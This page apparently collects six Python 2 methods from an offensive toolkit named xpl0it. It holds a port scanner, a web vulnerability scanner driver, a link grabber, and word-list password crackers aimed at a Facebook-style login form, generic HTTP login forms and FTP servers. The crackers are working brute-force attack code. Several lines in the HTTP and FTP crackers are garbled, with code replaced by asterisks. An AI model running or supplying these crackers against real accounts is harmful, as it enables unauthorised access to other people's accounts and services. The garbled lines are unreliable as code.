コード例 #1
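    def scan(self):
        """Run the anonymous-FTP check and, if links were collected, the per-link web checks.

        Progress is printed to stdout and the text returned by each check is
        appended to ``self.results`` under its own heading. The web checks
        (SQL, XSS, command injection, LFI, RFI) run only when the module-level
        ``vuln_links`` is non-empty after ``self.grab_links()`` returns.
        """
        # Only read in this method; presumably filled by grab_links() -- confirm there.
        global vuln_links

        print "\n[+] Target: " + self.target
        if self.verbose == 1:
            print "[!] Checking proxy..."

        if self.proxy != "":
            hst, prt = parse_address(self.proxy)
            pr = proxy(hst, prt, self.proxy_type)
            # A proxy that fails to set up is only reported; the checks below still run.
            if pr.set_browser_proxy() == True:
                print "[+] Proxy: " + self.proxy
            else:
                print "[-] Invalid or dead proxy"
        else:
            print "[-] Proxy not set"

        print "\n[*] Checking anonymous FTP login..."

        # self.results is reset here, so output from an earlier run is discarded.
        self.results = "Anonymous FTP login:\n"
        self.results += self.FTPScan()

        print "[*] Checking vulnerables links...\n"

        self.grab_links()

        if not vuln_links:
            self.results += "\nNo vulnerable links found"
            print "[-] No vulnerable links found\n"
        else:
            # NOTE(review): every other verbosity test on this page reads
            # self.verbose; self.verbose_mode may not exist on this class and
            # would then raise AttributeError here -- confirm against __init__.
            if self.verbose_mode == 1:
                print "[!] " + str(len(vuln_links)) + " vulnerable links found"

            print "[*] Checking SQL vulnerability...\n"

            self.results += "\nSQL vulnerability:\n"
            self.results += self.SQLScan()

            print "[*] Checking XSS vulnerability...\n"

            self.results += "\nXSS vulnerability:\n"
            self.results += self.XSSScan()

            print "[*] Checking command injection vulnerability...\n"

            self.results += "\nCommand injection vulnerability:\n"
            self.results += self.CMDScan()

            # The original message ended in a literal "n"; the backslash of the
            # newline escape was missing.
            print "[*] Checking LFI vulnerability...\n"

            self.results += "\nLFI vulnerability:\n"
            self.results += self.LFIScan()

            print "[*] Checking RFI vulnerability...\n"

            self.results += "\nRFI vulnerability:\n"
            self.results += self.RFIScan()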
コード例 #2
    def scan(self):
        """Try a TCP connection to each port of self.target in turn and record the ones that answer.

        For every port where ``pr.connect`` returns True, an HTTP ``HEAD``
        request is sent and up to 1024 bytes of the reply are kept as a
        banner. Findings are printed and appended to ``self.results``.

        On the wire this is a single source connecting to consecutive ports
        and sending the same HTTP HEAD line to each one that accepts,
        including services that do not speak HTTP.
        """
        print "\n[+] Target: " + self.target
        if self.verbose == 1:
            print "[!] Checking proxy..."

        if self.proxy != "":
            hst, prt = parse_address(self.proxy)
            pr = proxy(hst, prt, self.proxy_type)
            # A failed proxy setup is only reported; the loop below still uses this object.
            if pr.set_socket_proxy() == True:
                print "[+] Proxy: " + self.proxy
            else:
                print "[-] Invalid or dead proxy"
        else:
            print "[-] Proxy not set"
            # An empty proxy object is still created because the loop calls connect/send/recv on it.
            pr = proxy("", "", "")
            pr.set_no_proxy()

        print

        if self.verbose == 1:
            print "[!] Scanning target...\n"

        # range(65535) yields 0..65534: port 0 is tried and port 65535 is not.
        for port in range(65535):
            try:
                if pr.connect(self.target, port) == True:
                    pr.send("HEAD / HTTP/1.0\r\n\r\n")
                    banner = pr.recv(1024)
                    # NOTE(review): += assumes self.results already holds a string
                    # (the "" test after the loop suggests so) -- confirm in __init__.
                    self.results += "%s/tcp open %s\n" % (
                        port, self.porttoservice(port))
                    print "[+] %s/tcp open %s" % (port,
                                                  self.porttoservice(port))
                    if banner != "":
                        print banner
                        self.results += banner + "\n"
            # Bare except: every error for this port is discarded and the loop
            # moves on; in Python 2 this also swallows KeyboardInterrupt.
            except:
                pass

        # Reached with an empty result string when no port produced a finding.
        if self.results == "":
            self.results = "No open ports found"
            print "[-] Failed to connect to target"
            print "[-] " + self.results + "\n"
コード例 #3
ファイル: fbcrack.py プロジェクト: gregtampa/xpl0it
    def crack(self):
        """Submit each line of self.wordslist as the password for self.target on the login form.

        The first form on ``self.login_page`` is filled with ``self.target``
        in the ``email`` field and one candidate in the ``pass`` field per
        iteration. The loop stops at the first response whose URL does not
        contain ``login_attempt`` and stores that candidate in
        ``self.results``.

        Server-side this appears as a run of login submissions for one
        account identifier, each with a different password.
        """
        print "\n[+] Target: " + self.target
        if self.verbose == 1:
            print "[!] Checking proxy..."

        if self.proxy != "":
            hst, prt = parse_address(self.proxy)
            pr = proxy(hst, prt, self.proxy_type)
            # A failed proxy setup is only reported; the requests below are still made.
            if pr.set_browser_proxy() == True:
                print "[+] Proxy: " + self.proxy
            else:
                print "[-] Invalid or dead proxy"
        else:
            print "[-] Proxy not set"

        print

        if self.verbose == 1:
            print "[!] Connecting to target...\n"
        br = browser()

        try:
            br.open(self.login_page)

            if self.verbose == 1:
                print "[!] Checking wordslists..."

            # The whole file is read into memory and the handle is never closed explicitly.
            passwords = open(self.wordslist, "r").readlines()

            if self.verbose == 1:
                print "[!] Attack started...\n"

            for word in passwords:
                password = word.replace("\n", "")
                print "[*] Trying: " + password
                br.select_form(nr=0)
                br.form['email'] = self.target
                br.form['pass'] = password
                resp = br.submit()
                # Success is inferred only from the response URL; the page body is not inspected.
                if "login_attempt" not in resp.geturl():
                    self.results = "Password is " + password
                    print "[+] " + self.results
                    break
            # If the list is exhausted without a hit, self.results is left unchanged here.
        # Bare except: any failure in the block above (unreadable word list,
        # missing form field, network error) is reported as a connection failure.
        except:
            self.results = "Failed to crack password"
            print "[-] Failed to connect to target"
            print "[-] " + self.results + "\n"
コード例 #4
ファイル: grabber.py プロジェクト: gregtampa/xpl0it
	def grab_links(self):
		"""Fetch self.target and print the href attribute of every <a> element in it.

		The page is parsed with BeautifulSoup using the "lxml" parser. Nothing
		is returned; on any exception self.results is set to "No results found"
		and a failure message is printed.
		"""
		print "\n[+] Target: " + self.target
		if self.verbose == 1:
			print "[!] Checking proxy..."

		if self.proxy == "":
			print "[-] Proxy not set"
		else:
			proxy_host, proxy_port = parse_address(self.proxy)
			proxy_conf = proxy(proxy_host, proxy_port, self.proxy_type)
			# A failed proxy setup is only reported; the fetch below still happens.
			if proxy_conf.set_browser_proxy() == True:
				print "[+] Proxy: " + self.proxy
			else:
				print "[-] Invalid or dead proxy"

		print

		if self.verbose == 1:
			print "[!] Connecting to target..."
		session = browser()

		try:
			page_source = session.open(self.target).read()
			anchors = BeautifulSoup(page_source, "lxml").find_all('a')

			if self.verbose == 1:
				print "[!] Found %d links\n" % len(anchors)

			# Anchors without an href print as None.
			for anchor in anchors:
				print anchor.get("href")
		# Bare except: fetch and parse errors alike end up in this one branch.
		except:
			self.results = "No results found"
			print "[-] Failed to connect to target"
			print "[-] " + self.results + "\n"
コード例 #5
ファイル: httpcrack.py プロジェクト: gregtampa/xpl0it
    def crack(self):
        """Submit word-list candidates to the first form on self.login_page.

        With ``self.username`` set, each line of ``self.wordslist`` is tried
        as the password for that user; otherwise lines of ``self.userslist``
        are iterated as usernames. Field names come from ``self.user_form``
        and ``self.pass_form``. The first candidate treated as a hit is
        stored in ``self.results``.

        NOTE(review): the listing is damaged in the username branch, where
        text was replaced by asterisks, so that part is not valid Python as
        shown and is documented only as far as it is readable.
        """
        print "\n[+] Target: " + self.target
        if self.verbose == 1:
            print "[!] Checking proxy..."

        if self.proxy != "":
            hst, prt = parse_address(self.proxy)
            pr = proxy(hst, prt, self.proxy_type)
            # A failed proxy setup is only reported; the requests below are still made.
            if pr.set_browser_proxy() == True:
                print "[+] Proxy: " + self.proxy
            else:
                print "[-] Invalid or dead proxy"
        else:
            print "[-] Proxy not set"

        print

        if self.verbose == 1:
            print "[!] Connecting to target..."
        br = browser()

        try:
            br.open(self.login_page)

            if self.verbose == 1:
                print "[!] Checking wordslists..."

            # Both files are opened even when self.username is set, so an
            # unreadable users list lands in the except branch below. The
            # handles are never closed explicitly.
            usernames = open(self.userslist, "r").readlines()
            passwords = open(self.wordslist, "r").readlines()

            if self.username != "":
                for word in passwords:
                    password = word.replace("\n", "")
                    print "[*] Trying: " + password
                    br.select_form(nr=0)
                    br.form[self.user_form] = self.username
                    br.form[self.pass_form] = password
                    resp = br.submit()
                    # This is true whenever the response URL lacks at least one of
                    # the two substrings, so a reported hit is not reliable
                    # evidence of a valid credential.
                    if ("login"
                            not in resp.geturl()) or ("attempt"
                                                      not in resp.geturl()):
                        self.results = "Password is " + password
                        print "[+] " + self.results
                        break
            else:
                for user in usernames:
                    username = user.replace("\n", "")
                    # NOTE(review): the next two lines are garbled in the listing;
                    # the code between the string literals is missing.
                    print "[*] Trying username: "******"\n", "")
                        print "[*] Trying password: "******"login" not in resp.geturl()) or (
                                "attempt" not in resp.geturl()):
                            self.results = "Login is %s:%s" % (username,
                                                               password)
                            print "[+] " + self.results
                            break
        # Bare except: file, form and network errors are all reported with the same message.
        except:
            self.results = "Failed to crack password"
            print "[-] " + self.results
コード例 #6
    def crack(self):
        """Send USER/PASS pairs built from word lists to self.target:self.port.

        One connection is opened with ``pr.connect`` and reused for every
        attempt. A reply containing the substring ``230`` is treated as a
        successful login and stored in ``self.results``. With
        ``self.username`` empty, usernames come from ``self.userslist``;
        otherwise only ``self.wordslist`` is iterated.

        Server-side this appears as many failed logins on one session from
        one source, which a per-connection limit on failed logins would cut
        short.

        NOTE(review): the listing is damaged in three places where text was
        replaced by asterisks; those lines are not valid Python as shown.
        """
        print "\n[+] Target: " + self.target
        if self.username != "":
            # NOTE(review): garbled in the listing; the code between the two
            # string literals is missing.
            print "[+] Username: "******"[!] Checking proxy..."

        if self.proxy != "":
            hst, prt = parse_address(self.proxy)
            pr = proxy(hst, prt, self.proxy_type)
            # A failed proxy setup is only reported; the connect below still uses this object.
            if pr.set_socket_proxy() == True:
                print "[+] Proxy: " + self.proxy
            else:
                print "[-] Invalid or dead proxy"
        else:
            print "[-] Proxy not set"
            # An empty proxy object is still created because connect/send/recv are called on it.
            pr = proxy("", "", "")
            pr.set_no_proxy()

        print

        if self.username == "":
            try:
                # If connect does not return True, nothing is printed and
                # self.results is left unchanged.
                if pr.connect(self.target, self.port) == True:

                    if self.verbose == 1:
                        print "[!] Checking wordslists..."

                    # File handles are never closed explicitly.
                    usernames = open(self.userslist, "r").readlines()
                    passwords = open(self.wordslist, "r").readlines()

                    for user in usernames:
                        username = user.replace("\n", "")
                        # NOTE(review): the next two lines are garbled in the
                        # listing; the code between the string literals is missing.
                        print "[*] Trying username: "******"\n", "")
                            print "[*] Trying password: "******"USER " + username + "\r\n")
                            pr.recv(1024)
                            pr.send("PASS " + password + "\r\n")
                            r = pr.recv(1024)
                            # Substring match anywhere in the first 1024 bytes of the reply.
                            if "230" in r:
                                self.results = "Login is %s:%s" % (username,
                                                                   password)
                                print "[+] " + self.results
                                break
            # Bare except: file and network errors are reported with the same message.
            except:
                self.results = "Failed to crack password"
                print "[-] " + self.results
        else:
            try:
                if pr.connect(self.target, self.port) == True:

                    if self.verbose == 1:
                        print "[!] Checking wordslists..."

                    passwords = open(self.wordslist, "r").readlines()

                    for word in passwords:
                        password = word.replace("\n", "")
                        print "[*] Trying: " + password
                        # The reply to USER is read and discarded; only the
                        # reply to PASS is checked.
                        pr.send("USER " + self.username + "\r\n")
                        pr.recv(1024)
                        pr.send("PASS " + password + "\r\n")
                        r = pr.recv(1024)
                        if "230" in r:
                            self.results = "Password is " + password
                            print "[+] " + self.results
                            break
            # Bare except: file and network errors are reported with the same message.
            except:
                self.results = "Failed to crack password"
                print "[-] " + self.results